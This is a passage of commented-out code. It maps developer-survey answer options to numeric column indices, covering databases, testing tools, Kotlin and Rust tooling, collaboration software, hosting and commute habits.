# "kind_of_dev.Customer services development (websites, mobile apps, etc_)": 1709,
# "kind_of_dev.Open source projects": 1710,
# "kind_of_dev.Other": 1711
# },
# "java_unittesting": {
# "java_unittesting.JUnit": 555,
# "java_unittesting.TestNG": 556,
# "java_unittesting.Mockito": 557,
# "java_unittesting.PowerMock": 558,
# "java_unittesting.Spock": 559,
# "java_unittesting.EasyMock": 560,
# "java_unittesting.JMockit": 561,
# "java_unittesting.Other": 562
# },
# "swiftoc_platforms": {
# "swiftoc_platforms.iOS": 1101,
# "swiftoc_platforms.tvOS": 1102,
# "swiftoc_platforms.watchOS": 1103,
# "swiftoc_platforms.macOS": 1104,
# "swiftoc_platforms.I don\u2019t develop for Apple platforms": 1105
# },
# "swiftoc_cpp_libs": {
# "swiftoc_cpp_libs": 1107
# },
# "swiftoc_ui_frameworks": {
# "swiftoc_ui_frameworks.None": 1123,
# "swiftoc_ui_frameworks.XCTest": 1124,
# "swiftoc_ui_frameworks.KIF": 1125,
# "swiftoc_ui_frameworks.EarlGrey": 1126,
# "swiftoc_ui_frameworks.iOSSnapshotTestCase (FBSnapshotTestCase)": 1127,
# "swiftoc_ui_frameworks.Other": 1128
# },
# "swiftoc_db_viewer_do": {
# "swiftoc_db_viewer_do": 1141
# },
# "swiftoc_db_viewer": {
# "swiftoc_db_viewer_do": 1141,
# "swiftoc_db_viewer": 1142
# },
# "swiftoc_together": {
# "swiftoc_together": 1106
# },
# "employment_status": {
# "employment_status": 0
# },
# "test_types": {
# "test_types.None": 244,
# "test_types.Unit": 245,
# "test_types.Integration": 246,
# "test_types.End-to-End": 247,
# "test_types.Other": 248
# },
# "db": {
# "db.None": 251,
# "db.DB2": 252,
# "db.MS SQL Server": 253,
# "db.MySQL": 254,
# "db.Oracle Database": 255,
# "db.PostgreSQL": 256,
# "db.SQLite": 257,
# "db.Cassandra": 258,
# "db.Couchbase": 259,
# "db.HBase": 260,
# "db.MongoDB": 261,
# "db.Neo4j": 262,
# "db.Redis": 263,
# "db.Amazon Redshift": 264,
# "db.H2": 265,
# "db.MariaDB": 266,
# "db.Exasol": 267,
# "db.ClickHouse": 268,
# "db.Other": 269,
# "db_adopt.No, not planning to adopt / migrate": 270,
# "db_adopt.Yes, planning to adopt / migrate to other database(s) - Write in": 271,
# "db_adopt.DB2": 272,
# "db_adopt.MS SQL Server": 273,
# "db_adopt.MySQL": 274,
# "db_adopt.Oracle Database": 275,
# "db_adopt.PostgreSQL": 276,
# "db_adopt.SQLite": 277,
# "db_adopt.Cassandra": 278,
# "db_adopt.Couchbase": 279,
# "db_adopt.HBase": 280,
# "db_adopt.MongoDB": 281,
# "db_adopt.Neo4j": 282,
# "db_adopt.Redis": 283,
# "db_adopt.Amazon Redshift": 284,
# "db_adopt.H2": 285,
# "db_adopt.MariaDB": 286,
# "db_adopt.ClickHouse": 287,
# "db_adopt.Other": 288
# },
# "c_dependencymanager": {
# "c_dependencymanager.None": 625,
# "c_dependencymanager.build2": 626,
# "c_dependencymanager.Conan": 627,
# "c_dependencymanager.Nuget": 628,
# "c_dependencymanager.vcpkg": 629,
# "c_dependencymanager.I rely on a system package manager": 630,
# "c_dependencymanager.Other": 631
# },
# "cpp_dependencymanager": {
# "cpp_dependencymanager.None": 670,
# "cpp_dependencymanager.build2": 671,
# "cpp_dependencymanager.Conan": 672,
# "cpp_dependencymanager.Hunter": 673,
# "cpp_dependencymanager.Nuget": 674,
# "cpp_dependencymanager.vcpkg": 675,
# "cpp_dependencymanager.I rely on a system package manager": 676,
# "cpp_dependencymanager.Other": 677
# },
# "cpp_guidelines_tools": {
# "cpp_guidelines_tools.None": 696,
# "cpp_guidelines_tools.Clang-analyzer / Clang Static Analyzer": 697,
# "cpp_guidelines_tools.Clang-tidy": 698,
# "cpp_guidelines_tools.Cppcheck": 699,
# "cpp_guidelines_tools.Coverity": 700,
# "cpp_guidelines_tools.Cpplint": 701,
# "cpp_guidelines_tools.PVS-Studio": 702,
# "cpp_guidelines_tools.Klocwork": 703,
# "cpp_guidelines_tools.PC-lint / Flexelint": 704,
# "cpp_guidelines_tools.Parasoft C/C++test": 705,
# "cpp_guidelines_tools.QA-C++": 706,
# "cpp_guidelines_tools.Stack": 707,
# "cpp_guidelines_tools.Tool provided by my IDE (Visual Studio, ReSharper C++, CLion, etc_)": 708,
# "cpp_guidelines_tools.Other": 709
# },
# "cpp_guidelines_sources": {
# "cpp_guidelines_sources.None": 710,
# "cpp_guidelines_sources.Effective C++ series (books by <NAME>)": 711,
# "cpp_guidelines_sources.C++ Core Guidelines \u2013 main project (github_com/isocpp/CppCoreGuidelines)": 712,
# "cpp_guidelines_sources.Guru of the Week / Exceptional C++ series (blog/books by Herb Sutter)": 713,
# "cpp_guidelines_sources.C++ Coding Standards (book by <NAME> and <NAME>)": 714,
# "cpp_guidelines_sources.Abseil tips of the week": 715,
# "cpp_guidelines_sources.Google C++ Style Guide": 716,
# "cpp_guidelines_sources.CERT C++ Secure Coding Standard (www_securecoding_cert_org)": 717,
# "cpp_guidelines_sources.Coding Standards (<NAME>)": 718,
# "cpp_guidelines_sources.High Integrity C++ Coding Standard (Programming Research)": 719,
# "cpp_guidelines_sources.C++ Core Guidelines \u2013 a company-specific fork/branch augmented with internal rules": 720,
# "cpp_guidelines_sources.MISRA C++ (MIRA Ltd_)": 721,
# "cpp_guidelines_sources.Other": 722
# },
# "python_ds_libs": {
# "python_ds_libs.None": 757,
# "python_ds_libs.NumPy": 758,
# "python_ds_libs.SciPy": 759,
# "python_ds_libs.Pandas": 760,
# "python_ds_libs.Matplotlib": 761,
# "python_ds_libs.Seaborn": 762,
# "python_ds_libs.SciKit-Learn": 763,
# "python_ds_libs.Keras": 764,
# "python_ds_libs.TensorFlow": 765,
# "python_ds_libs.Theano": 766,
# "python_ds_libs.NLTK": 767,
# "python_ds_libs.Gensim": 768,
# "python_ds_libs.Other": 769
# },
# "python_other_libs": {
# "python_other_libs.None": 770,
# "python_other_libs.Requests": 771,
# "python_other_libs.aiohttp": 772,
# "python_other_libs.PyQT": 773,
# "python_other_libs.PyGTK": 774,
# "python_other_libs.wxPython": 775,
# "python_other_libs.Pillow": 776,
# "python_other_libs.Tkinter": 777,
# "python_other_libs.Pygame": 778,
# "python_other_libs.Twisted": 779,
# "python_other_libs.Asyncio": 780,
# "python_other_libs.Kivy": 781,
# "python_other_libs.Six": 782,
# "python_other_libs.Scrapy": 783,
# "python_other_libs.Other": 784
# },
# "python_web_libs": {
# "python_web_libs.None": 745,
# "python_web_libs.Django": 746,
# "python_web_libs.TurboGears": 747,
# "python_web_libs.web2py": 748,
# "python_web_libs.Bottle": 749,
# "python_web_libs.CherryPy\u00a0": 750,
# "python_web_libs.Flask\u00a0": 751,
# "python_web_libs.Hug": 752,
# "python_web_libs.Pyramid\u00a0": 753,
# "python_web_libs.Tornado": 754,
# "python_web_libs.Falcon": 755,
# "python_web_libs.Other": 756
# },
# "js_sslang": {
# "js_sslang.CSS": 1269,
# "js_sslang.Sass": 1270,
# "js_sslang.SCSS": 1271,
# "js_sslang.Less": 1272,
# "js_sslang.PostCSS": 1273,
# "js_sslang.CSS-in-JS": 1274,
# "js_sslang.CSS Modules": 1275,
# "js_sslang.Stylus": 1276,
# "js_sslang.Other": 1277
# },
# "js_graphql": {
# "js_graphql": 1278
# },
# "js_monorepo": {
# "js_monorepo": 1279
# },
# "learn_time": {
# "learn_time": 1647
# },
# "learn_kind_of_content": {
# "learn_kind_of_content": 1646
# },
# "php_qualitytools": {
# "php_qualitytools.None": 920,
# "php_qualitytools.PHP_CodeSniffer": 921,
# "php_qualitytools.PHP CS Fixer": 922,
# "php_qualitytools.PHPMD": 923,
# "php_qualitytools.PHPStan": 924,
# "php_qualitytools.Psalm": 925,
# "php_qualitytools.Phan": 926,
# "php_qualitytools.Other": 927
# },
# "php_templateengines": {
# "php_templateengines.None, I use pure PHP": 928,
# "php_templateengines.None, I don\u2019t render HTML": 929,
# "php_templateengines.Twig": 930,
# "php_templateengines.Blade": 931,
# "php_templateengines.Smarty": 932,
# "php_templateengines.Mustache": 933,
# "php_templateengines.Latte": 934,
# "php_templateengines.Other": 935
# },
# "php_profiler": {
# "php_profiler.None": 936,
# "php_profiler.Xdebug Profiler": 937,
# "php_profiler.XHProf": 938,
# "php_profiler.Blackfire_io": 939,
# "php_profiler.APM solutions (New Relic, Tideways, etc_)": 940,
# "php_profiler.HTTP load testing (ab, siege, etc_)": 941,
# "php_profiler.Other": 942
# },
# "devops_use_docker": {
# "devops_use_docker.Run dockerized utilities": 1504,
# "devops_use_docker.Run your application in one container, and backing services (e_g_ database)": 1505,
# "devops_use_docker.Run multiple application containers (e_g_ microservices)": 1506,
# "devops_use_docker.Other": 1507
# },
# "go_modules_outside": {
# "go_modules_outside": 1478
# },
# "go_migrate": {
# "go_migrate": 1479
# },
# "csharp_vsplugins": {
# "csharp_vsplugins.None": 828,
# "csharp_vsplugins.ReSharper": 829,
# "csharp_vsplugins.ReSharper C++": 830,
# "csharp_vsplugins.CodeRush": 831,
# "csharp_vsplugins.Visual Assist": 832,
# "csharp_vsplugins.Roslynator": 833,
# "csharp_vsplugins.Other": 834
# },
# "csharp_vsedition": {
# "csharp_vsedition": 851
# },
# "csharp_msdn_type": {
# "csharp_msdn_type": 869
# },
# "swiftoc_mock": {
# "swiftoc_mock.None": 1114,
# "swiftoc_mock.OCMock": 1115,
# "swiftoc_mock.OCMockito": 1116,
# "swiftoc_mock.Expecta": 1117,
# "swiftoc_mock.OCHamcrest": 1118,
# "swiftoc_mock.Cuckoo": 1119,
# "swiftoc_mock.SwiftHamcrest": 1120,
# "swiftoc_mock.Other": 1121
# },
# "kotlin_target": {
# "kotlin_target.JVM": 943,
# "kotlin_target.Android": 944,
# "kotlin_target.Kotlin for JavaScript": 945,
# "kotlin_target.Native": 946
# },
# "kotlin_jdk": {
# "kotlin_jdk.JDK 6": 947,
# "kotlin_jdk.JDK 7": 948,
# "kotlin_jdk.JDK 8": 949,
# "kotlin_jdk.JDK 9": 950,
# "kotlin_jdk.JDK 10": 951,
# "kotlin_jdk.JDK 11": 952,
# "kotlin_jdk.I don't know": 953
# },
# "kotlin_android": {
# "kotlin_android.4_1 \u2013 4_3_1 \u00a0Jelly Bean": 954,
# "kotlin_android.4_4 \u2013 4_4_4 \u00a0KitKat \u00a0": 955,
# "kotlin_android.5_0 \u2013 5_1_1 \u00a0Lollipop": 956,
# "kotlin_android.6_0 \u2013 6_0_1 \u00a0Marshmallow": 957,
# "kotlin_android.7_0 \u2013 7_1_2 \u00a0Nougat": 958,
# "kotlin_android.8_0 \u2013 8_1 \u00a0Oreo": 959,
# "kotlin_android.9_0 Pie": 960,
# "kotlin_android.Other": 961
# },
# "kotlin_platforms": {
# "kotlin_platforms.iOS (arm32, arm64, emulator x86_64)": 964,
# "kotlin_platforms.MacOS (x86_64)": 965,
# "kotlin_platforms.Android (arm32, arm64)": 966,
# "kotlin_platforms.Windows (mingw x86_64)": 967,
# "kotlin_platforms.Linux (x86_64, arm32, MIPS, MIPS little endian)": 968,
# "kotlin_platforms.Other": 969
# },
# "kotlin_purposes": {
# "kotlin_purposes.For work": 1034,
# "kotlin_purposes.For personal/side projects\u00a0": 1035,
# "kotlin_purposes.I occasionally play around with Kotlin (Hobby)": 1036,
# "kotlin_purposes.Other": 1037
# },
# "kotlin_projecttypes": {
# "kotlin_projecttypes.New projects": 1038,
# "kotlin_projecttypes.Old projects (migration)": 1039,
# "kotlin_projecttypes.Other": 1040
# },
# "communication_tools": {
# "communication_tools.Email (Microsoft Mail Server, Gmail, etc_)": 377,
# "communication_tools.Instant messaging/video calling (Slack, Skype, Hipchat, etc_)": 378,
# "communication_tools.Video conferencing (Google Meet, Zoom, etc_)": 379,
# "communication_tools.Calendars (Google Calendar, etc_)": 380,
# "communication_tools.Corporate portal (MS Sharepoint, Pingboard, etc_)": 381,
# "communication_tools.Service desk/Help desk (Zendesk, Jira Service Desk, etc_)": 382,
# "communication_tools.None": 383
# },
# "mobile_apps": {
# "mobile_apps.None": 384,
# "mobile_apps.Email (Microsoft Mail Server, Gmail, etc_)": 385,
# "mobile_apps.Instant messaging/video calling (Slack, Skype, Hipchat, etc_)": 386,
# "mobile_apps.Video conferencing (Google Meet, Zoom, etc_)": 387,
# "mobile_apps.Calendars (Google Calendar, etc_)": 388,
# "mobile_apps.Corporate portal (MS Sharepoint, Pingboard, etc_)": 389,
# "mobile_apps.Service desk/Help desk (Zendesk, Jira Service Desk, etc_)": 390
# },
# "corporate_mail_server": {
# "corporate_mail_server": 391
# },
# "corporate_suite": {
# "corporate_suite.None": 392,
# "corporate_suite.G Suite (Gmail, Google Drive, Meet, etc_)": 393,
# "corporate_suite.Office 365 (Outlook, Microsoft Teams, SharePoint, etc)": 394,
# "corporate_suite.Zoho": 395,
# "corporate_suite.Other": 396
# },
# "email_server": {
# "email_server": 403
# },
# "chat": {
# "chat.Mattermost": 411,
# "chat.Telegram": 412,
# "chat.WhatsApp": 413,
# "chat.Hipchat/Stride": 414,
# "chat.Viber": 415,
# "chat.Slack": 416,
# "chat.Rocket_Chat": 417,
# "chat.Zulip": 418,
# "chat.Skype": 419,
# "chat.Google Hangouts": 420,
# "chat.IRC": 421,
# "chat.Other": 422
# },
# "video_calls": {
# "video_calls.Slack": 423,
# "video_calls.Skype": 424,
# "video_calls.Skype for Business, Lync": 425,
# "video_calls.MS Teams": 426,
# "video_calls.Google Meet": 427,
# "video_calls.Polycom": 428,
# "video_calls.Zoom": 429,
# "video_calls.Other": 430
# },
# "knowledge_base": {
# "knowledge_base.None": 431,
# "knowledge_base.Confluence": 432,
# "knowledge_base.MediaWiki": 433,
# "knowledge_base.GitHub Wiki": 434,
# "knowledge_base.Stack Overflow for Teams": 435,
# "knowledge_base.Custom": 436,
# "knowledge_base.Other": 437
# },
# "document_collaboration_platforms": {
# "document_collaboration_platforms.None": 446,
# "document_collaboration_platforms.Office 365": 447,
# "document_collaboration_platforms.Zoho Office Suite": 448,
# "document_collaboration_platforms. Confluence": 449,
# "document_collaboration_platforms.Google Docs\u00a0": 450,
# "document_collaboration_platforms.Dropbox Paper": 451,
# "document_collaboration_platforms.Quip": 452,
# "document_collaboration_platforms.Other": 453
# },
# "file_sharing_tools": {
# "file_sharing_tools.None": 438,
# "file_sharing_tools.Google Drive": 439,
# "file_sharing_tools.Dropbox": 440,
# "file_sharing_tools.OneCloud": 441,
# "file_sharing_tools.Microsoft OneDrive": 442,
# "file_sharing_tools.Sharepoint": 443,
# "file_sharing_tools.On premise FTP server": 444,
# "file_sharing_tools.Other": 445
# },
# "swiftoc_serverside": {
# "swiftoc_serverside": 1150,
# "swiftoc_serverside_frameworks.Kitura": 1151,
# "swiftoc_serverside_frameworks.Vapor": 1152,
# "swiftoc_serverside_frameworks.Perfect": 1153,
# "swiftoc_serverside_frameworks.Other": 1154
# },
# "swiftoc_serverside_frameworks": {
# "swiftoc_serverside_frameworks.Kitura": 1151,
# "swiftoc_serverside_frameworks.Vapor": 1152,
# "swiftoc_serverside_frameworks.Perfect": 1153,
# "swiftoc_serverside_frameworks.Other": 1154
# },
# "rust_how": {
# "rust_how.Work": 1280,
# "rust_how.Personal / side projects": 1281,
# "rust_how.Hobby": 1282,
# "rust_how.Other": 1283,
# "rust_how_long": 1284
# },
# "rust_how_long": {
# "rust_how_long": 1284
# },
# "rust_version": {
# "rust_version.Current stable release": 1285,
# "rust_version.Previous stable release": 1286,
# "rust_version.Beta release": 1287,
# "rust_version.Nightly": 1288,
# "rust_version.1_30 or older": 1289
# },
# "rust_other_langs": {
# "rust_other_langs.None": 1290,
# "rust_other_langs.C": 1291,
# "rust_other_langs.C++": 1292,
# "rust_other_langs.Python": 1293,
# "rust_other_langs.Java": 1294,
# "rust_other_langs.Go": 1295,
# "rust_other_langs.JavaScript": 1296,
# "rust_other_langs.Other": 1297
# },
# "rust_code_interact": {
# "rust_code_interact.Language interop (foreign functions)": 1298,
# "rust_code_interact.RPC": 1299,
# "rust_code_interact.REST API": 1300,
# "rust_code_interact.Other": 1301
# },
# "rust_ide": {
# "rust_ide.Atom": 1304,
# "rust_ide.Emacs": 1305,
# "rust_ide.IntelliJ IDEA": 1306,
# "rust_ide.CLion": 1307,
# "rust_ide.Sublime Text": 1308,
# "rust_ide.Vim": 1309,
# "rust_ide.VSCode (Visual Studio Code)": 1310,
# "rust_ide.Other": 1311,
# "rust_ide_mostlove.Speed/performance": 1313,
# "rust_ide_mostlove.Ease of use": 1314,
# "rust_ide_mostlove.Code completion": 1315,
# "rust_ide_mostlove.Code navigation": 1316,
# "rust_ide_mostlove.Error highlighting": 1317,
# "rust_ide_mostlove.Tools integration": 1318,
# "rust_ide_mostlove.Debugger support": 1319,
# "rust_ide_mostlove.Other": 1320,
# "rust_ide_lack.Speed/performance": 1321,
# "rust_ide_lack.Ease of use": 1322,
# "rust_ide_lack.Code completion": 1323,
# "rust_ide_lack.Code navigation": 1324,
# "rust_ide_lack.Error highlighting": 1325,
# "rust_ide_lack.Tools integration": 1326,
# "rust_ide_lack.Debugger support": 1327,
# "rust_ide_lack.Other": 1328
# },
# "rust_build_tool": {
# "rust_build_tool.Cargo": 1329,
# "rust_build_tool.Other": 1330
# },
# "rust_testing": {
# "rust_testing.I don\u2019t use testing frameworks": 1331,
# "rust_testing.Rust tests": 1332,
# "rust_testing.Other": 1333
# },
# "rust_code_coverage": {
# "rust_code_coverage.I don\u2019t use code coverage tools": 1334,
# "rust_code_coverage.codecov": 1335,
# "rust_code_coverage.Other": 1336
# },
# "rust_profiler": {
# "rust_profiler.I don\u2019t use profiling tools": 1337,
# "rust_profiler.perf": 1338,
# "rust_profiler.callgrind/cachegrind": 1339,
# "rust_profiler.Other": 1340
# },
# "ai_replace": {
# "ai_replace": 526
# },
# "rust_os": {
# "rust_os": 1302
# },
# "rust_platforms": {
# "rust_platforms.Linux": 1353,
# "rust_platforms.Windows": 1354,
# "rust_platforms.macOS": 1355,
# "rust_platforms.Android": 1356,
# "rust_platforms.iOS": 1357,
# "rust_platforms.WebAssembly": 1358,
# "rust_platforms.Embedded": 1359
# },
# "rust_code_size": {
# "rust_code_size": 1360
# },
# "rust_external_deps": {
# "rust_external_deps": 1361
# },
# "rust_current_codebase": {
# "rust_current_codebase": 1362
# },
# "rust_devs_count": {
# "rust_devs_count": 1363
# },
# "cats_dogs": {
# "cats_dogs": 1648
# },
# "where_survey": {
# "where_survey": 1584
# },
# "rust_primary_ide": {
# "rust_primary_ide": 1312
# },
# "rust_ide_mostlove": {
# "rust_ide_mostlove.Speed/performance": 1313,
# "rust_ide_mostlove.Ease of use": 1314,
# "rust_ide_mostlove.Code completion": 1315,
# "rust_ide_mostlove.Code navigation": 1316,
# "rust_ide_mostlove.Error highlighting": 1317,
# "rust_ide_mostlove.Tools integration": 1318,
# "rust_ide_mostlove.Debugger support": 1319,
# "rust_ide_mostlove.Other": 1320
# },
# "rust_ide_lack": {
# "rust_ide_lack.Speed/performance": 1321,
# "rust_ide_lack.Ease of use": 1322,
# "rust_ide_lack.Code completion": 1323,
# "rust_ide_lack.Code navigation": 1324,
# "rust_ide_lack.Error highlighting": 1325,
# "rust_ide_lack.Tools integration": 1326,
# "rust_ide_lack.Debugger support": 1327,
# "rust_ide_lack.Other": 1328
# },
# "calendar_software": {
# "calendar_software.Google Calendar": 404,
# "calendar_software.Outlook": 405,
# "calendar_software.iCal (Calendar App in Mac)": 406,
# "calendar_software.Microsoft Exchange": 407,
# "calendar_software.IBM Domino": 408,
# "calendar_software.Fantastical": 409,
# "calendar_software.Other": 410
# },
# "email_clients": {
# "email_clients.Gmail": 397,
# "email_clients.Yahoo": 398,
# "email_clients.Outlook": 399,
# "email_clients.Thunderbird": 400,
# "email_clients.Mail in macOS": 401,
# "email_clients.Other": 402
# },
# "code_in_dreams": {
# "code_in_dreams": 1483
# },
# "where_host": {
# "where_host.Locally (on your workstation, developer environment or device)": 1539,
# "where_host.Private Servers (hosted on your company\u2019s cluster or server on-premises)": 1540,
# "where_host.Cloud Service (AWS, MS Azure, GCP, etc_)": 1541,
# "where_host.Other": 1542,
# "where_host_primarly": 1547,
# "where_host_plan.Locally (on your workstation, developer environment or device)": 1557,
# "where_host_plan.Private Servers (hosted on your company\u2019s cluster or server on-premises)": 1558,
# "where_host_plan.Amazon Web Services": 1559,
# "where_host_plan.Microsoft Azure": 1560,
# "where_host_plan.Google Cloud Platform": 1561,
# "where_host_plan.Rackspace": 1562,
# "where_host_plan.RedHat OpenShift": 1563,
# "where_host_plan.IBM SoftLayer": 1564,
# "where_host_plan.Cloud Foundry": 1565,
# "where_host_plan.Heroku": 1566,
# "where_host_plan.Other": 1567
# },
# "where_host_primarly": {
# "where_host_primarly": 1547
# },
# "where_host_plan": {
# "where_host_plan.Locally (on your workstation, developer environment or device)": 1557,
# "where_host_plan.Private Servers (hosted on your company\u2019s cluster or server on-premises)": 1558,
# "where_host_plan.Amazon Web Services": 1559,
# "where_host_plan.Microsoft Azure": 1560,
# "where_host_plan.Google Cloud Platform": 1561,
# "where_host_plan.Rackspace": 1562,
# "where_host_plan.RedHat OpenShift": 1563,
# "where_host_plan.IBM SoftLayer": 1564,
# "where_host_plan.Cloud Foundry": 1565,
# "where_host_plan.Heroku": 1566,
# "where_host_plan.Other": 1567
# },
# "rust_projecttypes": {
# "rust_projecttypes.Web development": 1341,
# "rust_projecttypes.Systems programming": 1342,
# "rust_projecttypes.DevOps": 1343,
# "rust_projecttypes.Network programming": 1344,
# "rust_projecttypes.Databases": 1345,
# "rust_projecttypes.Security": 1346,
# "rust_projecttypes.Desktop / GUI applications": 1347,
# "rust_projecttypes.Embedded devices / Internet of Things": 1348,
# "rust_projecttypes.Academic / Scientific / Numeric": 1349,
# "rust_projecttypes.Machine learning / Artificial intelligence": 1350,
# "rust_projecttypes.Games": 1351,
# "rust_projecttypes.Other": 1352
# },
# "commute": {
# "commute.I work / study from home": 1603,
# "commute.Car": 1604,
# "commute.Public transport": 1605,
# "commute.Bike": 1606,
# "commute.Motorcycle": 1607,
# "commute.By foot": 1608,
# "commute.Other": 1609
# },
# "fuel": {
# "fuel": 1610
# },
# "go_how": {
# "go_how": 1426
# },
# "sql_oracle": {
# "sql_oracle.18c": 1373,
# "sql_oracle.12_x": 1374,
# "sql_oracle.11_x": 1375,
# "sql_oracle.10_x": 1376,
# "sql_oracle.9_x": 1377,
# "sql_oracle.I'm not sure": 1378,
# "sql_oracle.Other": 1379
# },
# "kotlin_server_client": {
# "kotlin_server_client.Server-side (like Node_js)": 962,
# "kotlin_server_client.Browser": 963
# },
# "go_templateengines": {
# "go_templateengines.None": 1430,
# "go_templateengines.text/template": 1431,
# "go_templateengines.html/template": 1432,
# "go_templateengines.Plush": 1433,
# "go_templateengines.Pongo2": 1434,
# "go_templateengines.Other": 1435
# },
# "go_ide": {
# "go_ide": 1444
# },
# "position_level": {
# "position_level": 18
# },
# "do_crossplatform": {
# "do_crossplatform": 53
# },
# "crossplatform_platform": {
# "crossplatform_platform.Windows": 54,
# "crossplatform_platform.Unix/Linux": 55,
# "crossplatform_platform.macOS": 56,
# "crossplatform_platform.iOS": 57,
# "crossplatform_platform.Android": 58,
# "crossplatform_platform.Web": 59,
# "crossplatform_platform.Embedded": 60,
# "crossplatform_platform.Other": 61
# },
# "crossplatform_how_os": {
# "crossplatform_how_os.Using containers (e_g_ Docker, Vagrant)": 62,
# "crossplatform_how_os.Using VMs (e_g_ VirtualBox, vSphere)": 63,
# "crossplatform_how_os.Using physical machines/devices": 64,
# "crossplatform_how_os.I don\u2019t normally work with different OSes/platforms": 65,
# "crossplatform_how_os.Other": 66
# },
# "crossplatform_how_fs": {
# "crossplatform_how_fs.Using OS file browser (e_g_ File Explorer, Files, Finder)": 67,
# "crossplatform_how_fs.Using the IDE": 68,
# "crossplatform_how_fs.Using terminal (e_g_ cd, dir/ls, copy, mv)": 69,
# "crossplatform_how_fs.Using third-party GUI file managers (e_g_ muCommander, Path Finder, Total Commander)": 70,
# "crossplatform_how_fs.Using third-party terminal-based file managers (e_g_ Midnight Commander, Far Manager)": 71
# },
# "remote_files_operations": {
# "remote_files_operations.Browse files": 72,
# "remote_files_operations.Copy/move/delete files": 73,
# "remote_files_operations.Edit files": 74,
# "remote_files_operations.I don\u2019t normally work with remote files": 75
# },
# "vcs_how": {
# "vcs_how.From terminal": 514,
# "vcs_how.Using specialized tools (e_g_ GitKraken, Sourcetree, GitHub desktop, etc_)": 515,
# "vcs_how.From IDE": 516,
# "vcs_how.From web browser": 517,
# "vcs_how.Other": 518
# },
# "is_testing_integral": {
# "is_testing_integral": 289
# },
# "do_case_design": {
# "do_case_design": 290
# },
# "test_design_how": {
# "test_design_how": 291
# },
# "testing_types": {
# "testing_types.None": 292,
# "testing_types.Regression testing": 293,
# "testing_types.Functional testing": 294,
# "testing_types.Security testing": 295,
# "testing_types.Usability testing": 296,
# "testing_types.Performance testing": 297,
# "testing_types.Stress testing": 298,
# "testing_types.Stability testing": 299,
# "testing_types.Smoke testing": 300,
# "testing_types.I\u2019m not sure": 301,
# "testing_types.Other": 302
# },
# "testers_qa_ratio": {
# "testers_qa_ratio": 303
# },
# "store_testcases": {
# "store_testcases.I don\u2019t use any specific tools_": 306,
# "store_testcases.Microsoft Office documents (such as Excel spreadsheets)": 307,
# "store_testcases.Special test case management tools": 308,
# "store_testcases.Other": 309
# },
# "automated_tests": {
# "automated_tests": 310
# },
# "auto_tests_pl": {
# "auto_tests_pl.None": 334,
# "auto_tests_pl.Python": 335,
# "auto_tests_pl.JavaScript": 336,
# "auto_tests_pl.Java": 337,
# "auto_tests_pl.Kotlin": 338,
# "auto_tests_pl.C#": 339,
# "auto_tests_pl.Ruby": 340,
# "auto_tests_pl.Other": 341
# },
# "testers_qa_pskills": {
# "testers_qa_pskills": 304
# },
# "testers_qa_manual": {
# "testers_qa_manual": 305
# },
# "auto_tests_frameworks": {
# "auto_tests_frameworks.None": 311,
# "auto_tests_frameworks.TestNG": 312,
# "auto_tests_frameworks.JUnit": 313,
# "auto_tests_frameworks.NUnit / xUnit_Net": 314,
# "auto_tests_frameworks.MSTest / VSTest": 315,
# "auto_tests_frameworks.Robot Framework": 316,
# "auto_tests_frameworks.Cucumber": 317,
# "auto_tests_frameworks.SpecFlow": 318,
# "auto_tests_frameworks.RSpec": 319,
# "auto_tests_frameworks.Selenium WebDriver": 320,
# "auto_tests_frameworks.Allure": 321,
# "auto_tests_frameworks.Other": 322
# },
# "auto_tests_tools": {
# "auto_tests_tools.None": 323,
# "auto_tests_tools.SoapUI": 324,
# "auto_tests_tools.Apache JMeter": 325,
# "auto_tests_tools.Katalon Studio": 326,
# "auto_tests_tools.Postman": 327,
# "auto_tests_tools.Other": 328
# },
# "testing_platforms": {
# "testing_platforms.None": 329,
# "testing_platforms.SauceLabs": 330,
# "testing_platforms.BrowserStack": 331,
# "testing_platforms.CrossBrowserTesting": 332,
# "testing_platforms.Other": 333
# },
# "go_buildsystem": {
# "go_buildsystem.Go build": 1480,
# "go_buildsystem.Bazel": 1481,
# "go_buildsystem.Other": 1482
# },
# "devops_run_cont_apps": {
# "devops_run_cont_apps.Docker Compose": 1518,
# "devops_run_cont_apps.Minikube": 1519,
# "devops_run_cont_apps.Other": 1520
# },
# "kotlin_app_types": {
# "kotlin_app_types.Web Back-end": 970,
# "kotlin_app_types.Web Front-end": 971,
# "kotlin_app_types.Mobile": 972,
# "kotlin_app_types.Desktop": 973,
# "kotlin_app_types.Data analysis / BI": 974,
# "kotlin_app_types.Machine Learning": 975,
# "kotlin_app_types.Game development": 976,
# "kotlin_app_types.IoT": 977,
# "kotlin_app_types.Embedded": 978,
# "kotlin_app_types.Library or framework": 979,
# "kotlin_app_types.Tooling": 980,
# "kotlin_app_types.Other": 981
# },
# "kotlin_jb_libs": {
# "kotlin_jb_libs.None": 982,
# "kotlin_jb_libs.kotlin-wrappers/kotlin-react": 983,
# "kotlin_jb_libs.kotlin-wrappers/kotlin-css": 984,
# "kotlin_jb_libs.kotlin-wrappers/*": 985,
# "kotlin_jb_libs.kotlinx_coroutines": 986,
# "kotlin_jb_libs.kotlinx_html": 987,
# "kotlin_jb_libs.kotlinx_dom": 988,
# "kotlin_jb_libs.kotlinx_reflect_lite": 989,
# "kotlin_jb_libs.Anko Commons": 990,
# "kotlin_jb_libs.Anko Layouts": 991,
# "kotlin_jb_libs.Anko SQLite": 992,
# "kotlin_jb_libs.Anko Coroutines": 993,
# "kotlin_jb_libs.kotlin_test": 994,
# "kotlin_jb_libs.Ktor": 995,
# "kotlin_jb_libs.Dokka": 996,
# "kotlin_jb_libs.Exposed": 997,
# "kotlin_jb_libs.Other": 998
# },
# "kotlin_other_libs": {
# "kotlin_other_libs.None": 999,
# "kotlin_other_libs.Kotlin Android Extensions": 1000,
# "kotlin_other_libs.jackson-module-kotlin": 1001,
# "kotlin_other_libs.TornadoFX": 1002,
# "kotlin_other_libs.KotlinTest": 1003,
# "kotlin_other_libs.detekt": 1004,
# "kotlin_other_libs.kotlin-logging": 1005,
# "kotlin_other_libs.RxKotlin": 1006,
# "kotlin_other_libs.Spek": 1007,
# "kotlin_other_libs.HamKrest": 1008,
# "kotlin_other_libs.Kotlin-NoSQL": 1009,
# "kotlin_other_libs.Fuel": 1010,
# "kotlin_other_libs.Kotter Knife": 1011,
# "kotlin_other_libs.Kotson": 1012,
# "kotlin_other_libs.Kodein": 1013,
# "kotlin_other_libs.Klaxon": 1014,
# "kotlin_other_libs.mockito-kotlin": 1015,
# "kotlin_other_libs.khttp": 1016,
# "kotlin_other_libs.spark-kotlin": 1017,
# "kotlin_other_libs.javalin": 1018,
# "kotlin_other_libs.http4k": 1019,
